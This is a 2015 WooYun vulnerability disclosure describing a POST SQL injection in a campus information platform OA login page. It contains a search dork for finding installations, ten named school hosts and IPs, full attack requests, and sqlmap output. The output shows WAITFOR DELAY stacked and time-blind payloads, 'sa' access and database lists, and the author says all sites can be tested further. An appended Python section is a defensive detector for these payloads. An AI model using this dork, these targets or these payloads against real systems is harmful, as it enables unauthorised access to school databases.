
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-090309

Vulnerability title: A campus information platform OA system # generic POST injection

Related vendor: cncert Internet Emergency Response Center

Vulnerability author: 路人甲

Submitted: 2015-01-09 12:06

Fixed: 2015-04-13 16:58

Published: 2015-04-13 16:58

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 15

Vulnerability status: Handed over to a third-party partner organization (cncert National Internet Emergency Center) for handling

Vulnerability source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-01-09: Details sent to the vendor, awaiting vendor handling
2015-01-14: Vendor has confirmed; details disclosed to the vendor only
2015-01-17: Details opened to third-party security partners
2015-03-10: Details disclosed to core white hats and experts in related fields
2015-03-20: Details disclosed to regular white hats
2015-03-30: Details disclosed to intern white hats
2015-04-13: Details disclosed to the public

Brief description:

POST

Detailed description:

POST injection

Proof of vulnerability:

Keyword: intitle:校园信息平台 inurl:oa/login.aspx
Test sites:
http://all.hzvtc.edu.cn/OA/login.aspx
http://pt.szai.edu.cn/oa/login.aspx
http://59.50.76.151/oa/login.aspx
http://220.163.121.7/oa/login.aspx
http://crp.dzvtc.cn/OA/login.aspx
http://221.224.34.42/oa/login.aspx
http://218.22.68.206/oa/login.aspx
http://211.70.248.75/oa/login.aspx
http://222.195.192.201/oa/login.aspx
http://58.16.202.83/oa/login.aspx
Tests as follows:
http://all.hzvtc.edu.cn/OA/login.aspx
POST /OA/login.aspx HTTP/1.1
Host: all.hzvtc.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://all.hzvtc.edu.cn/OA/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYYsTPPHo4qZmORHe56val4GZNlb5A%3D%3D&__EVENTVALIDATION=%2FwEWBALC34%2FhDwKH4Yn8AQKu8uE5AvKm2soE8g1mnhKK8S6ycl3%2Fp7j6CWxOOJs%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZjCVbGZewKZKxtepFDTubDV8ZLHw==&__EVENTVALIDATION=/wEWBAK9ibmcBwKH4Yn8AQKu8uE5AvKm2soE3UibBe4GsZ6jwWetXTaah5zuBTw=&txt_%BF%A8%BA%C5=e'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZjCVbGZewKZKxtepFDTubDV8ZLHw==&__EVENTVALIDATION=/wEWBAK9ibmcBwKH4Yn8AQKu8uE5AvKm2soE3UibBe4GsZ6jwWetXTaah5zuBTw=&txt_%BF%A8%BA%C5=e' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23
---
[15:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: Microsoft IIS 7.5, ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:15:47] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\all.hzvtc.edu.cn'
current user: 'sa'
current database: 'CRP'
available databases [8]:
[*] [t?????G\n?y]
[*] CRP
[*] joffice2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
http://pt.szai.edu.cn/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: pt.szai.edu.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://pt.szai.edu.cn/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbTYqplOA6yzUCrC%2BYMndrJl1fFbA%3D%3D&__EVENTVALIDATION=%2FwEWBALk2o%2F4AwKH4Yn8AQKu8uE5AvKm2soEJ9FonmSXog%2B2pfSpDStyD0BU2hM%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&Button_%B5%C7%C2%BD.y=14
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDATION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&Button_%B5%C7%C2%BD.y=14
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDATION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=29&Button_%B5%C7%C2%BD.y=14
---
[15:15:47] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:15:47] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\pt.szai.edu.cn'
current user: 'sa'
current database: 'CRP'
available databases [8]:
[*] [t?????G\n?y]
[*] CRP
[*] joffice2
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
http://59.50.76.151/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 59.50.76.151
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://59.50.76.151/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 332
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYa9T3LkVQ%2Fy%2FRTz0mHqgq6%2FL%2BL6%2Bw%3D%3D&__EVENTVALIDATION=%2FwEWBAKLys%2BQAQKH4Yn8AQKu8uE5AvKm2soEj1zn80cQlKktA%2F%2F8ezR1hDFSWFc%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&Button_%B5%C7%C2%BD.y=20
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYYRxBuN87gva2cJmqXfA7ZeRLb2SA==&__EVENTVALIDATION=/wEWBALPkfWFAgKH4Yn8AQKu8uE5AvKm2soEGEej2A/mGA4ud /4vP7BVTgKxdw=&txt_%BF%A8%BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&Button_%B5%C7%C2%BD.y=20
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYYRxBuN87gva2cJmqXfA7ZeRLb2SA==&__EVENTVALIDATION=/wEWBALPkfWFAgKH4Yn8AQKu8uE5AvKm2soEGEej2A/mGA4ud /4vP7BVTgKxdw=&txt_%BF%A8%BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=120&Button_%B5%C7%C2%BD.y=20
---
[15:44:54] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2008
web application technology: ASP.NET, Microsoft IIS 7.5, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:44:54] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\59.50.76.151'
current user: 'sa'
current database: 'CRP'
http://220.163.121.7/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 220.163.121.7
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://220.163.121.7/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 347
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbVqTb47geYOQ5m4gN4FsL61r%2FU2A%3D%3D&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=%2FwEWBAKKupvhBgKH4Yn8AQKu8uE5AvKm2soEs37MtIx8oiam7E9IbJUFfCfzjr4%3D&txt_%BF%A8%BA%C5=w&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZow7mNzJxWVB6Pe3Hi4T9M I9BeQ==&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=/wEWBAKN/JnjCQKH4Yn8AQKu8uE5AvKm2soENY52zREHbp92pg 5NUF0Pd 0cmc=&txt_%BF%A8%BA%C5=w'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYZow7mNzJxWVB6Pe3Hi4T9M I9BeQ==&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=/wEWBAKN/JnjCQKH4Yn8AQKu8uE5AvKm2soENY52zREHbp92pg 5NUF0Pd 0cmc=&txt_%BF%A8%BA%C5=w' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=w&Button_%B5%C7%C2%BD.x=45&Button_%B5%C7%C2%BD.y=27
---
[15:48:20] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:48:20] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\220.163.121.7'
current user: 'sa\x03'
current database: 'CRP'
http://crp.dzvtc.cn/OA/login.aspx
POST /OA/login.aspx HTTP/1.1
Host: crp.dzvtc.cn
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://crp.dzvtc.cn/OA/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 315
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbXGIMYr3wWgB5yQQpnp9UiDi5WuQ%3D%3D&__EVENTVALIDATION=%2FwEWBALyntnHBAKH4Yn8AQKu8uE5AvKm2soEcyKYdHNODfzW1ueuDlwX8pCm5tY%3D&txt_%BF%A8%BA%C5=r&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&Button_%B5%C7%C2%BD.y=21
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbbJ KRTbxw5JF9XeEwvDQbRJRIkQ==&__EVENTVALIDATION=/wEWBALFm76vCQKH4Yn8AQKu8uE5AvKm2soEgpbBinNGQJbRilFbAaH6xZB 3Tg=&txt_%BF%A8%BA%C5=r'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&Button_%B5%C7%C2%BD.y=21
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbbJ KRTbxw5JF9XeEwvDQbRJRIkQ==&__EVENTVALIDATION=/wEWBALFm76vCQKH4Yn8AQKu8uE5AvKm2soEgpbBinNGQJbRilFbAaH6xZB 3Tg=&txt_%BF%A8%BA%C5=r' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=r&Button_%B5%C7%C2%BD.x=41&Button_%B5%C7%C2%BD.y=21
---
[15:54:14] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:54:14] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\crp.dzvtc.cn'
current user: 'sa'
current database: 'CRP'
http://221.224.34.42/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 221.224.34.42
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://221.224.34.42/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 321
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYbTYqplOA6yzUCrC%2BYMndrJl1fFbA%3D%3D&__EVENTVALIDATION=%2FwEWBALk2o%2F4AwKH4Yn8AQKu8uE5AvKm2soEJ9FonmSXog%2B2pfSpDStyD0BU2hM%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&Button_%B5%C7%C2%BD.y=28
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: txt_%BF%A8%BA%C5
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDATION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%BA%C5=e'; WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&Button_%B5%C7%C2%BD.y=28
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: __VIEWSTATE=/wEPDwUKLTY4NzcyMTIyMg9kFgICAQ9kFgQCAQ8PFgQeCUJhY2tDb2xvcgn/////HgRfIVNCAghkZAIDDw8WBB8ACf////8fAQIIZGQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl/nmbvpmYbfxcggyrCPrc6Iojntw9LxAoUBOQ==&__EVENTVALIDATION=/wEWBALex/TgDwKH4Yn8AQKu8uE5AvKm2soEWSQ7d8bNzqhKLkqduv5ex3fgKGI=&txt_%BF%A8%BA%C5=e' WAITFOR DELAY '0:0:5'--&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=39&Button_%B5%C7%C2%BD.y=28
---
[15:57:32] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows
web application technology: ASP.NET, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
[15:57:32] [INFO] fetched data logged to text files under 'E:\Python27\YuShen\output\221.224.34.42'
current user: 'sa'
current database: 'CRP'
http://218.22.68.206/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 218.22.68.206
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://218.22.68.206/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 322
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYahYsMWPUseFmOfVeXnRIABVLcLWA%3D%3D&__EVENTVALIDATION=%2FwEWBAL%2F0IzXBQKH4Yn8AQKu8uE5AvKm2soEc76DRYSCPZTKfDXI1sMqdKw4qxc%3D&txt_%BF%A8%BA%C5=xssx&txt_%C3%DC%C2%EB=xss&Button_%B5%C7%C2%BD.x=63&Button_%B5%C7%C2%BD.y=24
http://211.70.248.75/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 211.70.248.75
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://211.70.248.75/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 319
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYYf%2F38tQJ1KmAqjxSAvoy3ea%2FfIOQ%3D%3D&__EVENTVALIDATION=%2FwEWBAL1k8eeDwKH4Yn8AQKu8uE5AvKm2soEtmztsHWW1NSfE5YrD1qa0gF2Jjk%3D&txt_%BF%A8%BA%C5=a&txt_%C3%DC%C2%EB=a&Button_%B5%C7%C2%BD.x=89&Button_%B5%C7%C2%BD.y=31
http://222.195.192.201/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 222.195.192.201
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://222.195.192.201/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 352
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYZ8%2FrbOmeEk8DRSPNbQuUI6Qdc7Og%3D%3D&__VIEWSTATEGENERATOR=1C793C42&__EVENTVALIDATION=%2FwEWBAKhs%2BzzCAKH4Yn8AQKu8uE5AvKm2soEAaH41W02RK72PESV63rCEoPbfxw%3D&txt_%BF%A8%BA%C5=re&txt_%C3%DC%C2%EB=re&Button_%B5%C7%C2%BD.x=106&Button_%B5%C7%C2%BD.y=31
http://58.16.202.83/oa/login.aspx
POST /oa/login.aspx HTTP/1.1
Host: 58.16.202.83
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:34.0) Gecko/20100101 Firefox/34.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://58.16.202.83/oa/login.aspx
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 317
__VIEWSTATE=%2FwEPDwUKLTY4NzcyMTIyMmQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgEFDUJ1dHRvbl%2FnmbvpmYaOukj4zrbM5Z7ULuyom6SrXls2MQ%3D%3D&__EVENTVALIDATION=%2FwEWBAL%2Ft53OCwKH4Yn8AQKu8uE5AvKm2soEo4kqYlLdKfgVy8N1L72fSonaiyM%3D&txt_%BF%A8%BA%C5=e&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=54&Button_%B5%C7%C2%BD.y=36
Because my computer is slow and limited, dumping the databases takes a long time, so I won't list them one by one; the sites can be tested further, and the vulnerability exists on all of them!

Fix recommendation:

Filter~!
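A defender-side check for the pattern shown in the proof section above, as an added example that is not part of the original report and not code from the affected product. It decodes this login form's fields the way the server does (the captured requests percent-encode GBK bytes for the Chinese field names, so a UTF-8 decoder would mangle the keys) and flags the two indicators sqlmap used against the card-number field: the MSSQL time delay and the quote-plus-semicolon statement separator. This is the kind of rule a WAF or a review of POST bodies in IIS logs would apply. The sample bodies are constructed, and their __VIEWSTATE/__EVENTVALIDATION values are placeholders rather than the report's. The report's one-word fix is filtering; a detector like this is only a compensating control, and the durable fix for the login query is a parameterized statement so that the card-number value is never concatenated into the SQL text.

```python
import re
from urllib.parse import parse_qsl

# Constructed sample bodies modelled on the report's requests (the __VIEWSTATE and
# __EVENTVALIDATION values are placeholders, not the report's). The field names are
# GBK-encoded Chinese ("卡号" card number, "密码" password, "登陆" login button),
# so they must be decoded as GBK rather than the UTF-8 default.
BENIGN_BODY = (
    "__VIEWSTATE=PLACEHOLDER&__EVENTVALIDATION=PLACEHOLDER"
    "&txt_%BF%A8%BA%C5=2015001&txt_%C3%DC%C2%EB=secret"
    "&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23"
)
# Same shape as the report's "stacked queries" payload: e'; WAITFOR DELAY '0:0:5'--
STACKED_BODY = (
    "__VIEWSTATE=PLACEHOLDER&__EVENTVALIDATION=PLACEHOLDER"
    "&txt_%BF%A8%BA%C5=e%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--"
    "&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23"
)
# Same shape as the report's "time-based blind" payload: e' WAITFOR DELAY '0:0:5'--
BLIND_BODY = (
    "__VIEWSTATE=PLACEHOLDER&__EVENTVALIDATION=PLACEHOLDER"
    "&txt_%BF%A8%BA%C5=e%27+WAITFOR+DELAY+%270%3A0%3A5%27--"
    "&txt_%C3%DC%C2%EB=e&Button_%B5%C7%C2%BD.x=61&Button_%B5%C7%C2%BD.y=23"
)

# Indicators for the two techniques sqlmap reported against this form.
INDICATORS = [
    ("mssql_time_delay", re.compile(r"\bWAITFOR\s+DELAY\b", re.IGNORECASE)),
    ("stacked_query", re.compile(r"'\s*;")),
    ("comment_terminator", re.compile(r"--\s*$")),
    ("quote_breakout", re.compile(r"'")),
]


def decode_form(body: str, encoding: str = "gbk") -> dict:
    """Decode a form-urlencoded body whose percent-escapes are bytes in `encoding`."""
    return dict(parse_qsl(body, keep_blank_values=True, encoding=encoding, errors="replace"))


def scan_login_post(body: str) -> dict:
    """Map each user-supplied login field to the indicator labels found in its value.

    ASP.NET framework fields (__VIEWSTATE, __EVENTVALIDATION, ...) and the image-button
    coordinates (Button_*.x / .y) are skipped: they are not the injection point here.
    """
    findings = {}
    for key, value in decode_form(body).items():
        if key.startswith("__") or key.endswith((".x", ".y")):
            continue
        hits = [label for label, rx in INDICATORS if rx.search(value)]
        if hits:
            findings[key] = hits
    return findings


def technique(hits: list) -> str:
    """Name the sqlmap technique a set of indicators corresponds to, as in the report."""
    if "mssql_time_delay" in hits and "stacked_query" in hits:
        return "Microsoft SQL Server/Sybase stacked queries"
    if "mssql_time_delay" in hits:
        return "Microsoft SQL Server/Sybase time-based blind"
    return "unclassified"


if __name__ == "__main__":
    for name, body in (("benign", BENIGN_BODY), ("stacked", STACKED_BODY), ("blind", BLIND_BODY)):
        for field, hits in scan_login_post(body).items():
            print(f"{name}: {field} -> {technique(hits)} {hits}")
```

The encoding argument matters in practice: if the body is decoded as UTF-8, the GBK key bytes become replacement characters and a rule keyed on the card-number field name never matches, even though the value itself still carries the indicators.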

Copyright notice: please credit the source when reposting: 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 12

Confirmation time: 2015-01-14 10:29

Vendor reply:

Latest status:

None yet